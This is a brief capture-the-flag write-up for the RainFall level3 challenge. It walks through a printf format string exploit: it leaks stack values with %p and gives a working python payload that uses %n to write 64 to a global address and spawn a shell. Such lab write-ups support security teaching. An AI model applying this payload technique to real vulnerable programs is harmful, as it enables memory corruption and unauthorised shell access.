We used a printf format string exploit:
1. Find the right number of bytes to write:

```
level3@RainFall:~$ ./level3
AAAA %p %p %p %p %p
AAAA 0x200 0xb7fd1ac0 0xb7ff37d0 0x41414141 0x20702520
```

We need that 0x804988c equal 0x40 (64) to exec system("/bin/sh")
So with printf %n flag, we write 64 characters to this address.

\x8c\x98\x04\x08: Address we need to overwrite

(python -c "print('\x8c\x98\x04\x08' + '%c'*2 + '%58x' + '%n')" ;cat) | ./level3

explanation:

  4 -> \x8c\x98\x04\x08' address where we write the value
+ 2 -> '%c' * 2 -> skip 2 first address
+ 58 -> third argument with padding
-----
  64

